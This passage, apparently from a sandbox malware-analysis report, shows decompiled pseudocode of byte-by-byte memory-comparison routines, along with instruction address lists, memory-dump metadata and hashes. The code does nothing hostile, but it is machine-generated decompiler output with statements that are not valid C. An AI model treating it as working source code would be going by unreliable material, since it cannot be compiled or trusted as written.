									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                  0x0042a547
                  0x0042a547
                  0x0042a54d
                  0x0042a5cd
                  0x0042a5cf
                  0x0042a5d1
                  0x00000000
                  0x00000000
                  0x0042a5d7
                  0x0042a5dd
                  0x0042a65c
                  0x0042a65e
                  0x0042a660
                  0x00000000
                  0x00000000
                  0x0042a666
                  0x0042a66c
                  0x0042a6eb
                  0x0042a6ed
                  0x0042a6ef
                  0x00000000
                  0x00000000
                  0x0042a6f5
                  0x0042a6fb
                  0x0042a77a
                  0x0042a77c
                  0x0042a77e
                  0x00000000
                  0x00000000
                  0x0042a78a
                  0x0042a80a
                  0x0042a80c
                  0x0042a80e
                  0x00000000
                  0x00000000
                  0x0042a814
                  0x0042a81a
                  0x0042a899
                  0x0042a89b
                  0x0042a89d
                  0x00000000
                  0x00000000
                  0x0042a8a3
                  0x0042a8a9
                  0x0042a928
                  0x0042a92a
                  0x0042a92c
                  0x00000000
                  0x00000000
                  0x0042a93a
                  0x0042a93c
                  0x0042a51f
                  0x0042a527
                  0x0042a529
                  0x0042a105
                  0x0042a10d
                  0x0042a10f
                  0x0042a120
                  0x0042a120
                  0x00429d15
                  0x0042aa71
                  0x0042aa71
                  0x0042a536
                  0x0042a53c
                  0x0042a955
                  0x0042a955
                  0x00000000
                  0x0042a542
                  0x00000000
                  0x0042a542
                  0x0042a53c
                  0x0042a949
                  0x0042a94f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a94f
                  0x0042a8b2
                  0x0042a8b4
                  0x0042a8cb
                  0x0042a8d3
                  0x0042a8d5
                  0x0042a8ec
                  0x0042a8f4
                  0x0042a8f6
                  0x0042a90d
                  0x0042a915
                  0x0042a917
                  0x0042a924
                  0x0042a924
                  0x00000000
                  0x0042a917
                  0x0042a903
                  0x0042a907
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a907
                  0x0042a8e2
                  0x0042a8e6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a8e6
                  0x0042a8c1
                  0x0042a8c5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a8c5
                  0x0042a823
                  0x0042a825
                  0x0042a83c
                  0x0042a844
                  0x0042a846
                  0x0042a85d
                  0x0042a865
                  0x0042a867
                  0x0042a87e
                  0x0042a886
                  0x0042a888
                  0x0042a895
                  0x0042a895
                  0x00000000
                  0x0042a888
                  0x0042a874
                  0x0042a878
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a878
                  0x0042a853
                  0x0042a857
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a857
                  0x0042a832
                  0x0042a836
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a836
                  0x0042a794
                  0x0042a796
                  0x0042a7ad
                  0x0042a7b5
                  0x0042a7b7
                  0x0042a7ce
                  0x0042a7d6
                  0x0042a7d8
                  0x0042a7ef
                  0x0042a7f7
                  0x0042a7f9
                  0x0042a806
                  0x0042a806
                  0x00000000
                  0x0042a7f9
                  0x0042a7e5
                  0x0042a7e9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a7e9
                  0x0042a7c4
                  0x0042a7c8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a7c8
                  0x0042a7a3
                  0x0042a7a7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a7a7
                  0x0042a704
                  0x0042a706
                  0x0042a71d
                  0x0042a725
                  0x0042a727
                  0x0042a73e
                  0x0042a746
                  0x0042a748
                  0x0042a75f
                  0x0042a767
                  0x0042a769
                  0x0042a776
                  0x0042a776
                  0x00000000
                  0x0042a769
                  0x0042a755
                  0x0042a759
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a759
                  0x0042a734
                  0x0042a738
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a738
                  0x0042a713
                  0x0042a717
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a717
                  0x0042a675
                  0x0042a677
                  0x0042a68e
                  0x0042a696
                  0x0042a698
                  0x0042a6af
                  0x0042a6b7
                  0x0042a6b9
                  0x0042a6d0
                  0x0042a6d8
                  0x0042a6da
                  0x0042a6e7
                  0x0042a6e7
                  0x00000000
                  0x0042a6da
                  0x0042a6c6
                  0x0042a6ca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a6ca
                  0x0042a6a5
                  0x0042a6a9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a6a9
                  0x0042a684
                  0x0042a688
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a688
                  0x0042a5e6
                  0x0042a5e8
                  0x0042a5ff
                  0x0042a607
                  0x0042a609
                  0x0042a620
                  0x0042a628
                  0x0042a62a
                  0x0042a641
                  0x0042a649
                  0x0042a64b
                  0x0042a658
                  0x0042a658
                  0x00000000
                  0x0042a64b
                  0x0042a637
                  0x0042a63b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a63b
                  0x0042a616
                  0x0042a61a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a61a
                  0x0042a5f5
                  0x0042a5f9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a54f
                  0x0042a54f
                  0x0042a553
                  0x0042a557
                  0x0042a559
                  0x0042a570
                  0x0042a570
                  0x0042a574
                  0x0042a578
                  0x0042a57a
                  0x0042a591
                  0x0042a591
                  0x0042a595
                  0x0042a599
                  0x0042a59b
                  0x0042a5b2
                  0x0042a5b2
                  0x0042a5b6
                  0x0042a5ba
                  0x0042a5bc
                  0x0042a5c2
                  0x0042a5c5
                  0x0042a5c9
                  0x0042a5c9
                  0x00000000
                  0x0042a5bc
                  0x0042a5a1
                  0x0042a5a4
                  0x0042a5a8
                  0x0042a5ac
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a5ac
                  0x0042a580
                  0x0042a583
                  0x0042a587
                  0x0042a58b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a58b
                  0x0042a55f
                  0x0042a562
                  0x0042a566
                  0x0042a56a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a56a
                  0x00429940
                  0x00429940
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: e5087697884af4589422f39b7edb5d785bf61ffddb57a6e69f6b75451d5cd98b
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: 51D1B0B3E0A9B30A8736812D505813BEE626FC176035FC3E6CCD43F389D22A9D6595D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 0042A127, Relevance: .4, Instructions: 378COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042A127(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                  0x0042a127
                  0x0042a127
                  0x0042a12d
                  0x0042a1ac
                  0x0042a1ae
                  0x0042a1b0
                  0x00000000
                  0x00000000
                  0x0042a1b6
                  0x0042a1bc
                  0x0042a23b
                  0x0042a23d
                  0x0042a23f
                  0x00000000
                  0x00000000
                  0x0042a245
                  0x0042a24b
                  0x0042a2ca
                  0x0042a2cc
                  0x0042a2ce
                  0x00000000
                  0x00000000
                  0x0042a2d4
                  0x0042a2da
                  0x0042a359
                  0x0042a35b
                  0x0042a35d
                  0x00000000
                  0x00000000
                  0x0042a363
                  0x0042a369
                  0x0042a3e8
                  0x0042a3ea
                  0x0042a3ec
                  0x00000000
                  0x00000000
                  0x0042a3f8
                  0x0042a478
                  0x0042a47a
                  0x0042a47c
                  0x00000000
                  0x00000000
                  0x0042a482
                  0x0042a488
                  0x0042a507
                  0x0042a509
                  0x0042a50b
                  0x00000000
                  0x00000000
                  0x0042a519
                  0x00429d13
                  0x00429d15
                  0x0042aa71
                  0x0042aa71
                  0x0042a527
                  0x0042a529
                  0x0042a105
                  0x0042a10d
                  0x0042a10f
                  0x0042a120
                  0x0042a120
                  0x00000000
                  0x0042a10f
                  0x0042a536
                  0x0042a53c
                  0x0042a955
                  0x00000000
                  0x0042a955
                  0x00000000
                  0x0042a542
                  0x0042a491
                  0x0042a493
                  0x0042a4aa
                  0x0042a4b2
                  0x0042a4b4
                  0x0042a4cb
                  0x0042a4d3
                  0x0042a4d5
                  0x0042a4ec
                  0x0042a4f4
                  0x0042a4f6
                  0x0042a503
                  0x0042a503
                  0x00000000
                  0x0042a4f6
                  0x0042a4e2
                  0x0042a4e6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a4e6
                  0x0042a4c1
                  0x0042a4c5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a4c5
                  0x0042a4a0
                  0x0042a4a4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a4a4
                  0x0042a402
                  0x0042a404
                  0x0042a41b
                  0x0042a423
                  0x0042a425
                  0x0042a43c
                  0x0042a444
                  0x0042a446
                  0x0042a45d
                  0x0042a465
                  0x0042a467
                  0x0042a474
                  0x0042a474
                  0x00000000
                  0x0042a467
                  0x0042a453
                  0x0042a457
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a457
                  0x0042a432
                  0x0042a436
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a436
                  0x0042a411
                  0x0042a415
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a415
                  0x0042a372
                  0x0042a374
                  0x0042a38b
                  0x0042a393
                  0x0042a395
                  0x0042a3ac
                  0x0042a3b4
                  0x0042a3b6
                  0x0042a3cd
                  0x0042a3d5
                  0x0042a3d7
                  0x0042a3e4
                  0x0042a3e4
                  0x00000000
                  0x0042a3d7
                  0x0042a3c3
                  0x0042a3c7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a3c7
                  0x0042a3a2
                  0x0042a3a6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a3a6
                  0x0042a381
                  0x0042a385
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a385
                  0x0042a2e3
                  0x0042a2e5
                  0x0042a2fc
                  0x0042a304
                  0x0042a306
                  0x0042a31d
                  0x0042a325
                  0x0042a327
                  0x0042a33e
                  0x0042a346
                  0x0042a348
                  0x0042a355
                  0x0042a355
                  0x00000000
                  0x0042a348
                  0x0042a334
                  0x0042a338
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a338
                  0x0042a313
                  0x0042a317
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a317
                  0x0042a2f2
                  0x0042a2f6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a2f6
                  0x0042a254
                  0x0042a256
                  0x0042a26d
                  0x0042a275
                  0x0042a277
                  0x0042a28e
                  0x0042a296
                  0x0042a298
                  0x0042a2af
                  0x0042a2b7
                  0x0042a2b9
                  0x0042a2c6
                  0x0042a2c6
                  0x00000000
                  0x0042a2b9
                  0x0042a2a5
                  0x0042a2a9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a2a9
                  0x0042a284
                  0x0042a288
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a288
                  0x0042a263
                  0x0042a267
